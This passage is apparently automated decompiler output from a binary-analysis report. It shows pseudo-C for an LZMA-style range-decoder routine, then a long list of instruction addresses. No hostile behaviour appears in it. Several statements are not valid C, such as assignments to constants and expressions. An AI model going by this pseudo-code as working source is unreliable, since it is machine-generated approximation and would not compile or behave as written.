											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                0x00000000
                                                0x00407234
                                                0x00407234
                                                0x00407238
                                                0x0040725d
                                                0x00407267
                                                0x00000000
                                                0x0040723a
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407247
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00407328
                                                0x00407328
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00407366
                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x004072e6
                                                0x004072e6
                                                0x004072e6
                                                0x00406a82
                                                0x00406a82
                                                0x00406a82
                                                0x00406a8b
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00000000
                                                0x00406a9c
                                                0x00000000
                                                0x00000000
                                                0x00406aa5
                                                0x00406aa8
                                                0x00406aab
                                                0x00406aaf
                                                0x00000000
                                                0x00000000
                                                0x00406ab5
                                                0x00406ab8
                                                0x00406aba
                                                0x00406abb
                                                0x00406abe
                                                0x00406ac0
                                                0x00406ac1
                                                0x00406ac3
                                                0x00406ac6
                                                0x00406acb
                                                0x00406ad0
                                                0x00406ad9
                                                0x00406aec
                                                0x00406aef
                                                0x00406afb
                                                0x00406b23
                                                0x00406b25
                                                0x00406b33
                                                0x00406b33
                                                0x00406b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b27
                                                0x00406b27
                                                0x00406b2a
                                                0x00406b2b
                                                0x00406b2b
                                                0x00000000
                                                0x00406b27
                                                0x00406b01
                                                0x00406b06
                                                0x00406b06
                                                0x00406b0f
                                                0x00406b17
                                                0x00406b1a
                                                0x00000000
                                                0x00406b20
                                                0x00406b20
                                                0x00000000
                                                0x00406b20
                                                0x00000000
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b41
                                                0x004073ed
                                                0x00000000
                                                0x004073ed
                                                0x00406b4a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b60
                                                0x00406b63
                                                0x00406b67
                                                0x00000000
                                                0x00000000
                                                0x00406b69
                                                0x00406b6f
                                                0x00406b99
                                                0x00406b9f
                                                0x00406ba6
                                                0x00000000
                                                0x00406ba6
                                                0x00406b75
                                                0x00406b78
                                                0x00406b7d
                                                0x00406b7d
                                                0x00406b88
                                                0x00406b90
                                                0x00406b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bd8
                                                0x00406bde
                                                0x00406be1
                                                0x00406bee
                                                0x00406bf6
                                                0x00000000
                                                0x00000000
                                                0x00406bad
                                                0x00406bad
                                                0x00406bb1
                                                0x004073fc
                                                0x00000000
                                                0x004073fc
                                                0x00406bbd
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bcb
                                                0x00406bce
                                                0x00406bd1
                                                0x00406bd6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004072bb
                                                0x004072bf
                                                0x0040746e
                                                0x00000000
                                                0x0040746e
                                                0x004072cb
                                                0x004072d2
                                                0x004072da
                                                0x004072dd
                                                0x004072e0
                                                0x004072e0
                                                0x00000000
                                                0x00000000
                                                0x00406bfe
                                                0x00406c00
                                                0x00406c03
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c81
                                                0x00406c8b
                                                0x00000000
                                                0x00406c8b
                                                0x00406c05
                                                0x00406c09
                                                0x00406c0c
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c16
                                                0x00406c19
                                                0x00406c1b
                                                0x00406c20
                                                0x00406c23
                                                0x00406c26
                                                0x00406c2a
                                                0x00406c31
                                                0x00406c34
                                                0x00406c3b
                                                0x00406c3f
                                                0x00406c47
                                                0x00406c47
                                                0x00406c47
                                                0x00406c41
                                                0x00406c41
                                                0x00406c41
                                                0x00406c36
                                                0x00406c36
                                                0x00406c36
                                                0x00406c4b
                                                0x00406c4e
                                                0x00406c6c
                                                0x00406c6e
                                                0x00000000
                                                0x00406c50
                                                0x00406c50
                                                0x00406c53
                                                0x00406c56
                                                0x00406c59
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5e
                                                0x00406c61
                                                0x00406c63
                                                0x00406c64
                                                0x00406c67
                                                0x00000000
                                                0x00406c67
                                                0x00000000
                                                0x00406e9d
                                                0x00406ea1
                                                0x00406ebf
                                                0x00406ec2
                                                0x00406ec9
                                                0x00406ecc
                                                0x00406ecf
                                                0x00406ed2
                                                0x00406ed5
                                                0x00406ed8
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee2
                                                0x00406ee4
                                                0x00406ee7
                                                0x00406eea
                                                0x00406eed
                                                0x00406eed
                                                0x00406ef2
                                                0x00000000
                                                0x00406ef2
                                                0x00406ea3
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406eb3
                                                0x00000000
                                                0x00000000
                                                0x00406f07
                                                0x00406f0b
                                                0x00406f2e
                                                0x00406f31
                                                0x00406f34
                                                0x00406f3e
                                                0x00406f0d
                                                0x00406f0d
                                                0x00406f10
                                                0x00406f13
                                                0x00406f16
                                                0x00406f23
                                                0x00406f26
                                                0x00406f26
                                                0x00000000
                                                0x00000000
                                                0x00406f4a
                                                0x00406f4e
                                                0x00000000
                                                0x00000000
                                                0x00406f54
                                                0x00406f58
                                                0x00000000
                                                0x00000000
                                                0x00406f5e
                                                0x00406f60
                                                0x00406f64
                                                0x00406f64
                                                0x00406f67
                                                0x00406f6b
                                                0x00000000
                                                0x00000000
                                                0x00406fbb
                                                0x00406fbf
                                                0x00406fc6
                                                0x00406fc9
                                                0x00406fcc
                                                0x00406fd6
                                                0x00000000
                                                0x00406fd6
                                                0x00406fc1
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00406fed
                                                0x00406ff0
                                                0x00406ff3
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406ff6
                                                0x00406ff9
                                                0x00406ffc
                                                0x00406ffc
                                                0x00406fff
                                                0x00407002
                                                0x00407005
                                                0x00407005
                                                0x00407008
                                                0x0040700f
                                                0x00407014
                                                0x00000000
                                                0x00000000
                                                0x004070a2
                                                0x004070a2
                                                0x004070a6
                                                0x00407444
                                                0x00000000
                                                0x00407444
                                                0x004070ac
                                                0x004070af
                                                0x004070b2
                                                0x004070b6
                                                0x004070b9
                                                0x004070bf
                                                0x004070c1
                                                0x004070c1
                                                0x004070c1
                                                0x004070c4
                                                0x004070c7
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00407408
                                                0x00000000
                                                0x00407408
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca7
                                                0x00406cab
                                                0x00406cae
                                                0x00406cb4
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbc
                                                0x00406cbf
                                                0x00406cc2
                                                0x00000000
                                                0x00000000
                                                0x00406cc8
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ce5
                                                0x00406ce8
                                                0x00406cea
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cf6
                                                0x00406cf9
                                                0x00406cfc
                                                0x00406cff
                                                0x00406d02
                                                0x00406d1e
                                                0x00406d21
                                                0x00406d24
                                                0x00406d27
                                                0x00406d2e
                                                0x00406d32
                                                0x00406d34
                                                0x00406d38
                                                0x00406d04
                                                0x00406d04
                                                0x00406d08
                                                0x00406d10
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d3b
                                                0x00406d42
                                                0x00406d45
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d50
                                                0x00406d50
                                                0x00406d54
                                                0x00407414
                                                0x00000000
                                                0x00407414
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d64
                                                0x00406d67
                                                0x00406d6d
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d75
                                                0x00406d75
                                                0x00406d75
                                                0x00406d7b
                                                0x00000000
                                                0x00000000
                                                0x00406d7d
                                                0x00406d80
                                                0x00406d83
                                                0x00406d86
                                                0x00406d89
                                                0x00406d8c
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d98
                                                0x00406d9b
                                                0x00406db3
                                                0x00406db6
                                                0x00406db9
                                                0x00406dbc
                                                0x00406dbc
                                                0x00406dbf
                                                0x00406dc3
                                                0x00406dc5
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da5
                                                0x00406daa
                                                0x00406dac
                                                0x00406dae
                                                0x00406dae
                                                0x00406dc8
                                                0x00406dcf
                                                0x00406dd2
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00000000
                                                0x00000000
                                                0x00406e14
                                                0x00406e14
                                                0x00406e18
                                                0x00407420
                                                0x00000000
                                                0x00407420
                                                0x00406e1e
                                                0x00406e21
                                                0x00406e24
                                                0x00406e28
                                                0x00406e2b
                                                0x00406e31
                                                0x00406e33
                                                0x00406e33
                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00406ef5
                                                0x00406ef5
                                                0x00406ef8
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00000000
                                                0x00407321
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e5
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x00000000
                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00407033
                                                0x00407036
                                                0x00407039
                                                0x0040703b
                                                0x0040703d
                                                0x0040703d
                                                0x0040703e
                                                0x00407041
                                                0x00407048
                                                0x0040704b
                                                0x00407059
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040733e
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x00000000
                                                0x0040747a
                                                0x00407348
                                                0x0040734b
                                                0x0040734e
                                                0x00407352
                                                0x00407355
                                                0x0040735b
                                                0x0040735d
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00000000
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
